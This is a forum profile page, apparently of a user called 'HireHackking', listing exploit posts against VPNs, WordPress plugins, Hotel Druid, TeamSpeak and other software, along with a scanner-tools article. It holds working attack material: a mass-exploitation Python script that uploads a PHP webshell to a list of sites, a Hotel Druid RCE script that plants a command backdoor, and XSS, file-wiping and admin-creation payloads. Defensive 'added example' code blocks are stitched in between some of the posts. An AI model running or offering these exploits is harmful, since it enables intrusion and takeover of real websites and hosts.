
HireHackking


Everything posted by HireHackking

  1. # Exploit Title: H3C SSL VPN - Username Enumeration
     # Exploit Author: LiquidWorm

     H3C SSL VPN Username Enumeration

     Vendor: Hangzhou H3C Technologies Co. | New H3C Technologies Co., Ltd.
     Product web page: https://www.h3c.com
     Affected version: n/a

     Summary: H3C SSL VPN is a secure VPN system based on SSL connections. It allows
     mobile employees to access corporate networks remotely in an easy and secure way.
     The H3C SSL VPN devices are a new generation of professional SSL VPN devices for
     enterprises. They can function as ingress gateways as well as proxy gateways of
     internal server clusters. The SecPath SSL VPN devices are for small- to medium-sized
     enterprises, while the SecBlade SSL VPN devices are for medium-sized enterprises.

     Desc: The weakness is caused by the login script and how it verifies the provided
     credentials. An attacker can use this weakness to enumerate valid users on the
     affected application via the 'txtUsrName' POST parameter.

     Tested on: ssl vpn gateway HttpServer 1.1

     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                 @zeroscience

     Advisory ID: ZSL-2022-5697
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5697.php

     24.01.2022

     --

     Non-valid:
     ----------
     POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi
     txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=root&txtPassword=123456&selDomain=1&authmethod=1&vldCode=

     <tr><td align="center">User is not exist</TD></TR>

     Valid:
     ------
     POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi
     txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=administrator&txtPassword=123456&selDomain=1&authmethod=1&vldCode=

     <tr><td align="center">Input password incorrect</TD></TR>

     Valid:
     ------
     POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi
     txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=guest&txtPassword=123456&selDomain=1&authmethod=1&vldCode=

     <tr><td align="center">Local user state is inactive</TD></TR>
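The three responses quoted in the advisory differ by account state, and that difference is the enumeration oracle. The following is an added example, not part of the advisory and not H3C's code: a login check that mirrors those three messages next to a hardened one that returns a single generic failure and performs the same password-hashing work on every path, so neither the message nor the response time reveals whether the username exists. The user store, salts and passwords are constructed for the example.

```python
"""Login responses with and without a username-enumeration oracle (added example)."""
import hashlib
import hmac

ITERATIONS = 50_000  # kept low so the example runs quickly; use far more in production


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed user store (hypothetical): username -> (salt, password hash, account active?)
_SALT_A, _SALT_G = b"salt-administrator", b"salt-guest"
USERS = {
    "administrator": (_SALT_A, _hash("correct horse", _SALT_A), True),
    "guest": (_SALT_G, _hash("guest-pass", _SALT_G), False),  # exists, but inactive
}

# Used when the username is unknown so a hash is still computed (no timing oracle either)
_DUMMY_SALT = b"dummy-salt"
_DUMMY_HASH = _hash("placeholder-never-matches", _DUMMY_SALT)


def login_leaky(username: str, password: str) -> str:
    """Mirrors the three distinct messages quoted in the advisory; each one tells the
    caller something about the account (unknown / known / known but disabled)."""
    if username not in USERS:
        return "User is not exist"
    salt, stored, active = USERS[username]
    if not hmac.compare_digest(_hash(password, salt), stored):
        return "Input password incorrect"
    if not active:
        return "Local user state is inactive"
    return "OK"


GENERIC_FAILURE = "Invalid username or password"


def login_uniform(username: str, password: str) -> str:
    """Hardened form: one failure message for every cause, same work on every path."""
    salt, stored, active = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH, False))
    password_ok = hmac.compare_digest(_hash(password, salt), stored)
    if username in USERS and password_ok and active:
        return "OK"
    # Unknown user, wrong password and inactive account all collapse to the same answer.
    return GENERIC_FAILURE
```

Lockout or rate limiting can still be applied per account behind the generic message; what matters is that the response body and timing do not change with the account's state.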
  2. # Exploit Title: TeamSpeak 3.5.6 - Insecure File Permissions
     # Date: 2022-02-15
     # Exploit Author: Aryan Chehreghani
     # Contact: aryanchehreghani@yahoo.com
     # Vendor Homepage: https://www.teamspeak.com
     # Software Link: https://www.teamspeak.com/en/downloads
     # Version: 3.5.6
     # Tested on: Windows 10 x64

     # [ About - TeamSpeak ]:

     # TeamSpeak (TS) is a proprietary voice-over-Internet Protocol (VoIP)
     # application for audio communication between users on a chat channel,
     # much like a telephone conference call. Users typically use headphones with a microphone.
     # The client software connects to a TeamSpeak server of the user's choice, from which the user may join chat channels.
     # The target audience for TeamSpeak is gamers, who can use the software to communicate
     # with other players on the same team of a multiplayer video game.
     # Communicating by voice gives a competitive advantage by enabling players to keep their hands on the controls.

     # [ Description ]:

     # The TeamSpeak application was installed with insecure file permissions.
     # It was found that all folder and file permissions were incorrectly configured during installation.
     # It was possible to replace the service binary.

     # [ POC ]:

     C:\Users\user\AppData\Local\TeamSpeak 3 Client>icacls *.exe
     createfileassoc.exe NT AUTHORITY\SYSTEM:(F)
                         BUILTIN\Administrators:(F)
                         WIN-FREMP1UB3LB\Administrator:(F)

     error_report.exe NT AUTHORITY\SYSTEM:(F)
                      BUILTIN\Administrators:(F)
                      WIN-FREMP1UB3LB\Administrator:(F)

     package_inst.exe NT AUTHORITY\SYSTEM:(F)
                      BUILTIN\Administrators:(F)
                      WIN-FREMP1UB3LB\Administrator:(F)

     QtWebEngineProcess.exe NT AUTHORITY\SYSTEM:(F)
                            BUILTIN\Administrators:(F)
                            WIN-FREMP1UB3LB\Administrator:(F)

     ts3client_win32.exe NT AUTHORITY\SYSTEM:(F)
                         BUILTIN\Administrators:(F)
                         WIN-FREMP1UB3LB\Administrator:(F)

     Uninstall.exe NT AUTHORITY\SYSTEM:(F)
                   BUILTIN\Administrators:(F)
                   WIN-FREMP1UB3LB\Administrator:(F)

     update.exe NT AUTHORITY\SYSTEM:(F)
                BUILTIN\Administrators:(F)
                WIN-FREMP1UB3LB\Administrator:(F)

     Successfully processed 7 files; Failed processing 0 files

     # [ Exploit - Privilege Escalation ]:

     # Replace ts3client_win32.exe, update.exe, package_inst.exe, QtWebEngineProcess.exe, createfileassoc.exe and others ...
     # with any executable malicious file you want, then wait and get SYSTEM or Administrator rights (Privilege Escalation)
  3. # Exploit Title: Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
     # Author: Luis Martinez
     # Discovery Date: 2022-02-13
     # Vendor Homepage: https://www.uniview.com/Products/NVR/Easy/NVR304-S-P/#~Product%20features
     # Datasheet of NVR304-S-P: https://www.uniview.com/download.do?id=1819568
     # Tested Version: NVR304-16EP
     # Tested on: Windows 10 Pro 21H2 x64 es - Firefox 91.6.0esr
     # Vulnerability Type: Reflected Cross-Site Scripting (XSS)
     # CVE: N/A

     # Proof of Concept:

     http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('XSS')</script>
  4. When we occasionally become interested in scanning an IP, or want to conceal the scanning IP, have we ever thought of alternatives to nmap? Today this article recommends 5 excellent websites for that use.

     The disadvantage of using Nmap online is that it is not possible to run Nmap scripts as easily as when using Nmap from the terminal. However, most current online Nmap scanning services perform scans on the most popular ports.

     01 IPV6Scanner

     As the name implies, IPV6Scanner.com is a network scanner that allows any user to perform port scanning for any hostname, IPv4 or IPv6-based address. Its simple interface requires you to fill in the target and click Scan to perform a default scan on the most common server ports.

     02 Nmap.online

     Nmap.online is probably the most classic Nmap-like alternative: a web-based application rather than one running on the terminal. It provides a simple interface to scan any domain or IP address, and you can choose the type of scan you want to perform, such as quick scan, port scan, operating system detection, or traceroute. After the scan is complete, you get Nmap scan results that display the open, filtered, and closed ports in the same way as traditional Nmap (screenshot of scan results not included).

     Scan type description:
     - Quick Scan: probably the most commonly used option, because it scans the 100 most common ports.
     - Port Scan: performs TCP scans on ports 21, 22, 25, 80, 110, 143, 443, and 445 and enables service detection, so you can get data about the services running remotely.
     - OS detection: detects the operating system running on the remote host.

     03 Shodan

     Shodan is a search engine focusing on indexing data from any connected device, such as computers, servers, mobile phones, desks, webcams, smart TVs, refrigerators, smart kitchens, medical devices, traffic lights, and other IoT devices.

     (screenshot of scan results not included)

     As shown above, it can accurately obtain the target's open ports and the corresponding port information. In addition to port information, you also get detailed information about the IP, such as the country, organization, ISP, last update date, associated hostname, ASN, the running web technologies found on that IP, and more.

     04 ZoomEye

     Developed by the Chinese cybersecurity company Knownsec Inc., ZoomEye is an IoT search engine designed to become a search engine for cyberspace. Like Shodan, ZoomEye also provides data about port scans. The scan below shows exposed port 22 as well as the operating system, tags, geolocation and the version of the software listening on the port, plus friendly port statistics.

     Of course, ZoomEye also supports more advanced syntax, so let's give a brief example below.

     Command              | Description                                                      | Example
     ---------------------|------------------------------------------------------------------|-------------------------------------------------------------------------------
     (space)              | represents OR logic                                              | service:'ssh' service:'http' searches for data of the ssh or http protocol
     +                    | represents AND logic                                             | device:'router'+after:'2020-01-01' searches for router data after 2020-01-01
     -                    | represents NOT logic                                             | country:'CN'-subdivisions:'beijing' searches for data in China except Beijing
     country:'CN'         | search for a country's assets; the abbreviation or the full     | country:'China', country:'china'
                          | Chinese/English name can be used                                 |
     ip:'8.8.8'           | search the IP's C-segment assets                                 |
     cidr:52.2.254.36/16  | the IP's B-segment assets                                        |
     cidr:52.2.254.36/8   | the IP's A-segment assets                                        |
     port:80              | searching multiple ports at the same time is currently not supported |

     Other examples can be found on the official website.

     05 SurfaceBrowser

     SurfaceBrowser™ is a complete Internet surface analyzer that gives you access to a complete data security platform that includes current and historical DNS records, complete IP blocks, SSL certificates, managed domains, associated domains, complete subdomain lists, user agent information for each IP, and of course open ports and running services.
  5. # Exploit Title: WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)
     # Date: 09-11-2021
     # Exploit Author: Ceylan Bozogullarindan
     # Exploit Website: https://bozogullarindan.com
     # Vendor Homepage: https://bestwebsoft.com/
     # Software Link: https://bestwebsoft.com/products/wordpress/plugins/error-log-viewer/
     # Version: 1.1.1
     # Tested on: Linux
     # CVE: CVE-2021-24966 (https://wpscan.com/vulnerability/166a4f88-4f0c-4bf4-b624-5e6a02e21fa0)

     # Description:

     Error Log Viewer is a simple utility plugin that helps to find and view log files with errors right from the WordPress admin dashboard. Get access to all log files from one place. View the latest activity, select logs by date, view a full log file or clear a log file!

     I've especially emphasized the "clearing a log file" statement because the feature of "clearing a log file" can be used to delete an arbitrary file in a WordPress web site. The reason for the vulnerability is that the value of the file path which is going to be deleted is not properly and sufficiently controlled. The name of the parameter leading to the vulnerability is "rrrlgvwr_clear_file_name". It can be manipulated only by authenticated users. An attacker can use this vulnerability to destroy the web site by deleting the wp-config.php file, or to cover their fingerprints by clearing related log files.

     # Steps To Reproduce

     1. Install and activate the plugin.
     2. Click the "Log Monitor" available under the Error Log Viewer menu item.
     3. Choose a log file to clear.
     4. Intercept the request via Burp or any other local proxy tool.
     5. Replace the value of the parameter "rrrlgvwr_clear_file_name" with the file path which is going to be cleared, such as /var/www/html/wp-config.php.
     6. Check the content of the cleared file. You will see that the file is empty.

     # PoC - Supported Materials
     ---------------------------------------------------------------------------
     POST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1
     Host: 127.0.0.1:8000
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 603
     Connection: close
     Upgrade-Insecure-Requests: 1
     Cookie: [admin+]

     rrrlgvwr_select_log=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Flearnpress%2Finc%2Fgateways%2Fpaypal%2Fpaypal-ipn%2Fipn_errors.log&rrrlgvwr_lines_count=10&rrrlgvwr_from=&rrrlgvwr_to=&rrrlgvwr_show_content=all&rrrlgvwr_newcontent=%5B05-Feb-2015+07%3A28%3A49+UTC%5D+Invalid+HTTP+request+method.%0D%0A%0D%0A++++++++++++++++++++++++&rrrlgvwr_clear_file=Clear+log+file&rrrlgvwr_clear_file_name=/var/www/html/wp-config.php&rrrlgvwr_nonce_name=1283d54cc5&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Drrrlgvwr-monitor.php
     ---------------------------------------------------------------------------
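The root cause in the post above is that the path to be cleared comes straight from the request. The following is an added example, not part of the advisory and not the plugin's code: a clear-log routine that canonicalises the requested path, confines it to a configured log directory, and only ever truncates an existing `.log` file. The directory layout, file names and contents are constructed in a temporary directory so the example runs offline.

```python
"""Confining a 'clear log file' feature to its log directory (added example)."""
import tempfile
from pathlib import Path


def resolve_log_path(requested: str, log_root: str) -> Path:
    """Return the canonical path for `requested` if and only if it lives under `log_root`."""
    root = Path(log_root).resolve()
    target = Path(requested)
    if not target.is_absolute():
        target = root / target
    target = target.resolve()  # collapses '..' and follows symlinks before the check
    if root != target and root not in target.parents:
        raise PermissionError(f"{requested!r} is outside the log directory {root}")
    if target.suffix.lower() != ".log":
        raise PermissionError(f"{requested!r} is not a .log file")
    if not target.is_file():
        raise PermissionError(f"{requested!r} does not exist; clearing must not create files")
    return target


def clear_log(requested: str, log_root: str) -> Path:
    """Truncate the log file selected by the user; raises PermissionError on anything else."""
    target = resolve_log_path(requested, log_root)
    with open(target, "w"):
        pass
    return target


def demo() -> dict:
    """Constructed scenario: a log directory next to a wp-config.php that must survive."""
    site = Path(tempfile.mkdtemp())
    logs = site / "logs"
    logs.mkdir()
    (logs / "ipn_errors.log").write_text("[05-Feb-2015 07:28:49 UTC] Invalid HTTP request method.\n")
    (site / "wp-config.php").write_text("<?php define('DB_PASSWORD', 'constructed');\n")

    results = {"cleared_size": clear_log("ipn_errors.log", str(logs)).stat().st_size, "rejected": []}
    # The advisory's wp-config.php case plus two other escapes from the log directory.
    for bad in ("../wp-config.php", str(site / "wp-config.php"), "/etc/passwd"):
        try:
            clear_log(bad, str(logs))
        except PermissionError:
            results["rejected"].append(bad)
    results["wp_config_intact"] = (site / "wp-config.php").stat().st_size > 0
    return results
```

Resolving before comparing is the important ordering: a check on the raw string (for example rejecting `..`) is bypassed by symlinks and by alternate encodings, whereas `Path.resolve()` yields the real target the file system would open.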
  6. # Exploit Title: Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path
     # Discovery by: Luis Martinez
     # Discovery Date: 2022-02-13
     # Vendor Homepage: https://www.emerson.com/en-us
     # Software Link : https://www.opertek.com/descargar-software/?prc=_326
     # Tested Version: 9.80 Build 8695
     # Vulnerability Type: Unquoted Service Path
     # Tested on OS: Windows 10 Pro x64 es

     # Step to discover Unquoted Service Path:

     C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "TrapiServer" |findstr /i /v """

     Trapi File Server    TrapiServer    C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe    Auto

     # Service info:

     C:\>sc qc TrapiServer
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: TrapiServer
             TYPE               : 120  WIN32_SHARE_PROCESS (interactive)
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : Trapi File Server
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem

     # Exploit:

     A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications, where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  7. # Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
     # Date: 16.02.2022
     # Author: Numan Türle
     # CVE: CVE-2022-0441
     # Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
     # Version: <2.7.6
     # https://www.youtube.com/watch?v=SI_O6CHXMZk
     # https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6
     # https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed

     POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1
     Connection: close
     Accept: application/json, text/javascript, */*; q=0.01
     X-Requested-With: XMLHttpRequest
     Accept-Encoding: gzip, deflate
     Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
     Content-Type: application/json
     Content-Length: 339

     {"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}
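The request above works because the registration handler copies client-supplied "profile fields" into user meta, including `wp_capabilities`. The following is an added example, not from the advisory and not the plugin's code: a server-side validator that accepts only an allowlist of top-level fields and of custom profile keys, rejects the body outright when a protected WordPress meta key appears, and assigns the role itself. The request body is the advisory's own JSON, parsed here as constructed input; the field allowlists are hypothetical.

```python
"""Rejecting mass assignment of wp_capabilities at registration (added example)."""
import json

# The advisory's request body, embedded as constructed sample input.
ADVISORY_BODY = json.loads(
    '{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD",'
    '"user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,'
    '"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],'
    '"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}'
)

# Hypothetical allowlists: which top-level fields and which custom profile keys a client may set.
ALLOWED_FIELDS = {
    "user_login", "user_email", "user_password", "user_password_re", "become_instructor",
    "privacy_policy", "degree", "expertize", "auditory", "additional", "additional_instructors",
    "profile_default_fields_for_register",
}
ALLOWED_PROFILE_KEYS = {"degree", "expertize", "auditory"}
DEFAULT_ROLE = "subscriber"  # the server decides the role; the client never does


class RegistrationRejected(ValueError):
    pass


def sanitize_registration(body: dict) -> dict:
    """Return the fields the server will act on, or raise if the body tries to set anything else."""
    unexpected = set(body) - ALLOWED_FIELDS
    if unexpected:
        raise RegistrationRejected(f"unexpected fields: {sorted(unexpected)}")

    profile = body.get("profile_default_fields_for_register") or {}
    blocked = sorted(k for k in profile if k not in ALLOWED_PROFILE_KEYS)
    if blocked:
        # wp_capabilities, wp_user_level and any other unknown key land here.
        raise RegistrationRejected(f"profile keys not permitted at registration: {blocked}")

    if body.get("user_password") != body.get("user_password_re"):
        raise RegistrationRejected("password confirmation does not match")
    if body.get("privacy_policy") is not True:
        raise RegistrationRejected("privacy policy not accepted")

    return {
        "user_login": body["user_login"],
        "user_email": body["user_email"],
        "role": DEFAULT_ROLE,
        "profile": {k: profile[k] for k in profile},
    }
```

Rejecting rather than silently stripping is deliberate: a body that names `wp_capabilities` is not a confused client, and a logged rejection is the detection signal for this attack.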
  8. # Exploit Title: Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path
     # Discovery by: Luis Martinez
     # Discovery Date: 2022-02-17
     # Vendor Homepage: https://www.wondershare.com/
     # Software Link : https://download.wondershare.com/drfone_full3360.exe
     # Tested Version: 11.4.9
     # Vulnerability Type: Unquoted Service Path
     # Tested on OS: Windows 10 Pro x64 es

     # Step to discover Unquoted Service Path:

     C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DFWSIDService" | findstr /i /v """

     Wondershare WSID help    DFWSIDService    C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe    Auto

     # Service info:

     C:\>sc qc DFWSIDService
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: DFWSIDService
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : Wondershare WSID help
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem

     # Exploit:

     A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications, where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  9. # Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated)
     # Google Dork: inurl:wp-content/plugins/dzs-zoomsounds
     # Date: 16/02/2022
     # Exploit Author: Overthinker1877 (1877 Team)
     # Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/
     # Version: 6.60
     # Tested on: Windows / Linux

     import os import requests import threading from multiprocessing.dummy import Pool,Lock from bs4 import BeautifulSoup import time import smtplib,sys,ctypes from random import choice from colorama import Fore from colorama import Style from colorama import init import re import time from time import sleep init(autoreset=True) fr = Fore.RED gr = Fore.BLUE fc = Fore.CYAN fw = Fore.WHITE fy = Fore.YELLOW fg = Fore.GREEN sd = Style.DIM sn = Style.NORMAL sb = Style.BRIGHT Bad = 0 Good = 0 def Folder(directory): if not os.path.exists(directory): os.makedirs(directory) Folder("exploited") def clear(): try: if os.name == 'nt': os.system('cls') else: os.system('clear') except: pass def finder(i) : global Bad,Good head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'} try : x = requests.session() listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php'] for script in listaa : url = (i+"/"+script) while True : req_first = x.get(url, headers=head) if "error:http raw post data does not exist" in req_first.text : burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"} burp0_data = "<?php\r\nerror_reporting(0);\r\necho(base64_decode(\"T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=\"));\r\n@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);\r\necho(\"<a href=\".$_FILES['f']['name'].\">\".$_FILES['f']['name'].\"</a>\");\r\n?>" requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45) urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php") req_second = x.get(urlx, headers=head) if "Overthinker1877" in req_second.text : Good = Good + 1 print(fg+"Exploited "+fw+">> "+fg+" = "+urlx) with open("exploited/shell.txt","a") as file : file.write(urlx+"\n") file.close() else : Bad = Bad + 1 print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit") else : Bad = Bad + 1 print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln") pass break except : pass if os.name == 'nt': ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad)) else : sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad)) def key_logo(): clear = '\x1b[0m' colors = [36, 32, 34, 35, 31, 37] x = ' [ + ] OVERTHINKER1877 EXPLOIT' for N, line in enumerate(x.split('\n')): sys.stdout.write('\x1b[1;%dm%s%s\n' % (choice(colors), line, clear)) time.sleep(0.05) def process(line): time.sleep(1) def run() : key_logo() clear() print(""" [-] -----------------------------------------[-] [+] WwW.1877.TeaM [-] -----------------------------------------[-] \n \n""") file_name = input("Website List : ") op = open(file_name,'r').read().splitlines() TEXTList = [list.strip() for list in op] p = Pool(int(input('Thread : '))) p.map(finder, TEXTList) run()
  10. # Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE)
      # Date: 05/01/2022
      # Exploit Author: 0z09e (https://twitter.com/0z09e)
      # Vendor Homepage: https://www.hoteldruid.com/
      # Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz
      # Version: 3.0.3
      # CVE : CVE-2022-22909

      #!/usr/bin/python3

      import requests
      import argparse

      def login(target, username="", password="", noauth=False):
          login_data = {
              "vers_hinc": "1",
              "nome_utente_phpr": username,
              "password_phpr": password
          }
          if not noauth:
              login_req = requests.post(f"{target}/inizio.php", data=login_data, verify=False)
              if '<a class="nav" id="nb_men" href="./inizio.php?id_sessione=' in login_req.text:
                  token = login_req.text.split('<a class="nav" id="nb_men" href="./inizio.php?id_sessione=')[1].split('">&nbsp;<b>')[0]
                  anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]
                  ret_data = {"token": token, "anno": anno}
                  #print("ret data" + ret_data)
                  return ret_data
              else:
                  return False
          else:
              login_req = requests.get(f"{target}/inizio.php", verify=False)
              try:
                  anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]
                  token = ""
                  ret_data = {"token": token, "anno": anno}
                  return ret_data
              except:
                  return False

      def check_privilege(target, anno, token=""):
          priv_req = requests.get(f"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti", verify=False)
          #print(priv_req.text)
          if "Modify" in priv_req.text:
              return True
          else:
              return False

      def add_room(target, anno, token=""):
          add_room_data = {
              "anno": anno,
              "id_sessione": token,
              "n_app": "{${system($_REQUEST['cmd'])}}",
              "crea_app": "SI",
              "crea_letti": "",
              "n_letti": "",
              "tipo_tabella": "appartamenti"
          }
          add_req = requests.post(f"{target}/visualizza_tabelle.php", data=add_room_data, verify=False)
          #print(add_req.text)
          if "has been added" in add_req.text:
              return True
          else:
              return False

      def test_code_execution(target):
          code_execution_req = requests.get(f"{target}/dati/selectappartamenti.php?cmd=id")
          if "uid=" in code_execution_req.text:
              return code_execution_req.text.split("\n")[0]
          else:
              return False

      def main():
          # ASCII-art banner (the art was flattened in this copy; the text is kept as posted)
          banner = """\n /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$ | $$ | $$ | $$ | $$ | $$__ $$ |__/ | $$ | $$ | $$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ \ $$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$ | $$$$$$$$ /$$__ $$|_ $$_/ /$$__ $$| $$ | $$ | $$ /$$__ $$| $$ | $$| $$ /$$__ $$ | $$__ $$| $$ \ $$ | $$ | $$$$$$$$| $$ | $$ | $$| $$ \__/| $$ | $$| $$| $$ | $$ | $$ | $$| $$ | $$ | $$ /$$| $$_____/| $$ | $$ | $$| $$ | $$ | $$| $$| $$ | $$ | $$ | $$| $$$$$$/ | $$$$/| $$$$$$$| $$ | $$$$$$$/| $$ | $$$$$$/| $$| $$$$$$$ |__/ |__/ \______/ \___/ \_______/|__/ |_______/ |__/ \______/ |__/ \_______/\n\nExploit By - 0z09e (https://twitter.com/0z09e)\n\n"""
          parser = argparse.ArgumentParser()
          req_args = parser.add_argument_group('required arguments')
          req_args.add_argument("-t", "--target", help="Target URL. Example : http://10.20.30.40/path/to/hoteldruid", required=True)
          req_args.add_argument("-u", "--username", help="Username", required=False)
          req_args.add_argument("-p", "--password", help="password", required=False)
          req_args.add_argument("--noauth", action="store_true", default=False, help="If No authentication is required to access the dashboard", required=False)
          args = parser.parse_args()
          target = args.target
          if target[-1] == "/":
              target = target[:-1]
          noauth = args.noauth
          username = args.username
          password = args.password
          if noauth == False and (username == None or password == None):
              print('[-] Please provide the authentication method.')
              quit()
          print(banner)
          if not noauth:
              print(f"[*] Logging in with the credential {username}:{password}")
              login_result = login(username=username, password=password, target=target)
              if login_result != False:
                  token = login_result.get('token')
                  anno = login_result.get('anno')
              else:
                  print("[-] Login failed, Check your credential or check if login is required or not .")
                  quit()
          else:
              print('[*] Trying to access the Dashboard.')
              login_result = login(username=username, password=password, target=target, noauth=True)
              if login_result != False:
                  token = login_result.get('token')
                  anno = login_result.get('anno')
              else:
                  print('[-] Unable to access the dashboard, Maybe the dashboard is protected with credential.')
                  exit()
          print("[*] Checking the privilege of the user.")
          if check_privilege(target=target, token=token, anno=anno):
              print("[+] User has the privilege to add room.")
          else:
              print("[-] User doesn't have the privilege to add room.")
              exit()
          print("[*] Adding a new room.")
          if add_room(target=target, anno=anno, token=token):
              print('[+] Room has been added successfully.')
          else:
              print('[-] Unknown error occured, unable to add room. Maybe the room has already been added')
              exit()
          print('[*] Testing code exection')
          output = test_code_execution(target=target)
          if output != False:
              print(f"[+] Code executed successfully, Go to {target}/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.")
              print(f'[+] Example : {target}/dati/selectappartamenti.php?cmd=id')
              print(f"[+] Example Output : {output}")
              exit()
          else:
              print(f"[-] Code execution failed. If the Target is Windows, Check {target}/dati/selectappartamenti.php and try execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?cmd=hostname")
              exit()

      main()
  11. # Exploit Title: Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)
      # Date: 24.02.2022
      # Exploit Author: Fikrat Ghuliev (Ghuliev)
      # Vendor Homepage: https://cipi.sh/ <https://www.aapanel.com/>
      # Software Link: https://cipi.sh/ <https://www.aapanel.com/>
      # Version: 3.1.15
      # Tested on: Ubuntu

      When the user wants to add a new server on the "Server" panel, the "name" parameter has no filtering at all.

      POST /api/servers HTTP/1.1
      Host: IP
      Content-Length: 102
      Accept: application/json
      X-Requested-With: XMLHttpRequest
      Authorization: Bearer
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
